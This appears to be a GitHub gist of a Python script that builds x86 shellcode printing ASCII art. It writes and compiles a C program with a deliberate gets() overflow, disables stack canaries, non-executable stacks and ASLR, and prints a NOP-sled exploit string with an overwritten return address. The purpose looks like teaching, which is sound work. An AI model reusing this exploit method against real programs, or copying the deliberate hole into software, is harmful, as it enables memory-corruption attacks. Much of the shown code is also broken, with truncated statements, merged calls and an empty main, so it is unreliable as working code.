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Last active October 17, 2019 20:56
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# Note, you must disable ASLR for this to work
# sudo sysctl kernel.randomize_va_space=0 on debian
# Usage: python3 ./ art.ascii
# Program will spit out exploit string and vuln.out file
# Running the exploit:
# printf "PROGRAM_OUTPUT_STRING" | ./vuln.out
# yay?
import sys, os, io
import subprocess
# Shortcut to write to stderr
def log(msg):
print(msg, file=sys.stderr)
# Read ascii art from a plaintext file
def read_art(artfile):
art = "" # Art as one long string
log(f"Reading art file {artfile}")
with open(artfile) as inputfile:
while True:
# Read one character at a time until end of file
char =
if not char:
log("Done reading art file")
art += char
return art
# We're going to write our ascii art onto the program's
# stack 4 characters at a time (32-bit program means
# we've got 4 chars per register / push statement).
def push_art(art):
div = 0 # divisions, i.e. 4 chars at a time
padding = "" # we may need to pad with extra spaces
byte_count = 0 # keep track of total number of bytes
output = list() # List of 4 char sequences to push on stack
lines = 0 # number of push commands
# Do we need 0, 1, 2, 3 padding spaces?
log(f"Need {4-(len(art)%4)} bytes. Adding space characters (\\0x20)")
for i in range(0, 4-(len(art)%4)):
padding += "20"
# Work backwards through the string to build the
# push statements (since stacks are last-in-first-out
for i in range(len(art)-1, -1, -1):
# for each new push statement
if (div == 0):
# start the push statement
output.append("push 0x")
# if we have padding to "spend")
if (len(padding) > 0):
# add the padding
output[lines] += padding
# padding is two digits (1 byte)
# so add half padding to total byte count
# and number of chars so far
div += int(len(padding)/2)
byte_count += int(len(padding)/2)
# once we've used the padding once, get rid of it
padding = ""
# Add the ascii character as a hex value
output[lines] += "{0:02x}".format(ord(art[i]),"x")
byte_count += 1
div += 1
# if we've hit 4 characters in the push statement, start a new one
if (div >= 4):
div = 0
output[lines] += "\n"
lines += 1
return output, byte_count
# We need to do some asm work to make sure that the shellcode does not
# contain any \\0x0a characters. The newline is a string terminator
# for a lot of read functions, so it will stop reading our shellcode
# if it contains newlines. We'll fix this by "adding" one to the value
# 0x09 and then pushing the result onto the stack.
def fix_string_terminators(push_statements):
bigstring = ""
# Check to see where the 0a might be (if any)
# There is likely a better way to do this but I don't care
# Basically, depending on where the 0a is, shift a 1 into that position in the eax register
# Then add the 4 characters (where one is 0x09) to eax.
for line in push_statements:
if (line[7:9] == "0a"):
line = line[0:7] + "09" + line[9:]
s1 = "\txor eax, eax\n"
s2 = "\tmov al, 0x1\n"
s3 = "\tshl eax, 0x18\n"
line = s1 + s2 + s3 + line
line = line.replace("push", "\tadd eax,")
line = line + "\tpush eax\n"
elif (line[9:11] == "0a"):
line = line[0:9] + "09" + line[11:]
s1 = "\txor eax, eax\n"
s2 = "\tmov al, 0x1\n"
s3 = "\tshl eax, 0x10\n"
line = s1 + s2 + s3 + line
line = line.replace("push", "\tadd eax,")
line = line + "\tpush eax\n"
elif (line[11:13] == "0a"):
line = line[0:11] + "09" + line[13:]
line = line.replace("push", "\tmov eax,")
line += "\tinc ah\n"
line += "\tpush eax\n"
elif (line[13:15] == "0a"):
line = line[0:13] + "09" + line[15:]
line = line.replace("push", "\tmov eax,")
line += "\tinc al\n"
line += "\tpush eax\n"
line = "\t" + line
bigstring += line
return bigstring
def write_asm_file(filename, string_of_push_statements, byte_count):
asmfile = filename + ".asm"
with open(asmfile, "w") as f:
f.write("global _start\n") # start in main
f.write("section .text\n") # text section for instructions
f.write("_start:\n") # main
f.write("\txor ecx, ecx\n") # clear ecx
f.write("\tpush ecx\n") # push ecx (null terminator)
f.write("\txor eax, eax\n") # clear eax
f.write("\txor ebx, ebx\n") # clear ebx
f.write("\txor ecx, ecx\n") # clear ecx
f.write("\txor edx, edx\n") # clear edx
f.write("\tmov al, 0x04\n") # write is syscall number 4
f.write("\tmov bl, 0x01\n") # write to file descriptor 1 (stdout)
f.write("\tmov ecx, esp\n") # address of string (top of stack)
# gotta be careful which dx we write into, based on byte_count
if (byte_count <= 255):
f.write("\tmov dl, ") # number of bytes to write
elif (byte_count > 255 and byte_count <= 65535):
f.write("\tmov dx, ")
f.write("\tint 0x80\n") # do syscall
return asmfile
def assemble_and_link_asm_file(asmfile, filename):
# requires nasm
objfile = filename + ".o"
outfile = filename + ".out"
# assemble/link["nasm", "-f", "elf32", asmfile])["ld", "-melf_i386", objfile, "-o", outfile])
# Comment these out if you want to examine the assembly file
return outfile
# Use objdump -d to spit out the opcodes and do some pasring
def get_opcodes(program):
# objdump -d will dump assembly and opcodes for the text section
cp =["objdump", "-d", program], capture_output=True)
# The default output is gross so we're trying to separate just the opcodes
lines = str(cp.stdout).split("\\n")
lines = lines[7:-1]
opcodes = ""
for line in lines:
line = line.split("\\t")[1]
line = line.split(" ")
for opcode in line:
if (len(opcode) > 0):
opcodes += "\\x" + opcode
return opcodes
# write a c program with a buffer overflow vuln in gets()
# need the opcodes to determine buffer length
def write_vulnerable_c_program(opcodes, art_len):
vulnfile = "vuln.c"
with open(vulnfile, "w") as f:
f.write("#include <stdio.h>\n")
f.write("void bad() {\n")
# Determine buffer size
#4 bytes for ret addr
#4 bytes for old ebp
#4 bytes for 32->64 stuff
#add len(msg) for length of string since it goes on stack
buffersize = int(len(opcodes)/4)+12+art_len
#add an extra byte if its odd
#left pad with nop
if (buffersize%2==1):
buffersize += 1
opcodes="\\x90" + opcodes
f.write("\tchar buffer["+str(buffersize)+"];\n")
f.write("\tprintf(\"%p\\n\", buffer);\n") # Print address of buffer
f.write("\tgets(buffer);\n") #vuln
f.write("void main() {\n")
return vulnfile, buffersize
# Compile the vulnerable program
def compile_vuln_file(vulnfile):
# Lots of GCC switches for debugging and disabling memory protections
# ld will warn that gets() is insecure
output_file = "vuln.out"
gcc = "gcc -w " #disable warnings
gcc += "-fno-builtin " #don't use built-in versions of printf or puts
gcc += "-O0 " #don't optimize the code
gcc += "-z execstack " #disable non-executable stacks
gcc += "-fno-stack-protector " #disable stack canaries
gcc += "-ggdb " #turn on debugging symbols to help gdb
gcc += "-mpreferred-stack-boundary=2 " #align stack to 2 byte boundaries
gcc += "-m32 " #we're building a 32-bit executable, you may need extra gcc stuff for this
gcc += f"{vulnfile} -o {output_file}"" "), capture_output=True)
return output_file
# The vulnerable C program prints the address of the buffer
# We'll run it once and grab the output so we can insert it
# into the sample exploit string
def get_buffer_address(vulnprogram):
process =['echo "test" | ./vuln.out'], shell=True, stdout=subprocess.PIPE, universal_newlines=True)
# output holds return address we need for overflow
output = process.stdout
# Need to flip the address because little endian
# The program spits out something like 0xABCDEFGH
# We need it in the form \xGH\xEF\xCD\xAB (yay little endian)
a = output[8:10]
b = output[6:8]
c = output[4:6]
d = output[2:4]
return f"\\x{a}\\x{b}\\x{c}\\x{d}"
def main():
# grab ascii art from file
artfile = sys.argv[1]
art = read_art(artfile)
# write asm instructions to push art onto stack
push_statements, byte_count = push_art(art)
# remove any newline characters from the shellcode
string_of_push_statements = fix_string_terminators(push_statements)
# strip extension
artfile_root = artfile[0:artfile.find(".")]
# write assembly instructions to file
asmfile = write_asm_file(artfile_root, string_of_push_statements, byte_count)
# build into ELF executable
program = assemble_and_link_asm_file(asmfile, artfile_root)
# extract opcodes from ELF
opcodes = get_opcodes(program)
# Write a C program with a buffer overflow vuln (i.e. use gets())
vulnfile, buffersize = write_vulnerable_c_program(opcodes, len(art))
# Compile vulnerable program into an ELF
vulnprogram = compile_vuln_file(vulnfile)
# Run the vulnerable ELF once to get the address of the vulnerable buffer
buffer_address = get_buffer_address(vulnprogram)
# Exploit string
print("Run this command to test your overflow:")
print("printf \"", end="")
print("\\x90"*(buffersize-int((len(opcodes)/4))-len(art)), end="") #NOP Slide
print(opcodes, end="") # Shellcode
print("\\x90"*(len(art)+8), end="") # Extra nops on stack since we'll be pushing the art into this area
print(buffer_address, end="") # overflow IP
print(f"\" | ./{vulnprogram}")
# Cleanup
if __name__ == "__main__":
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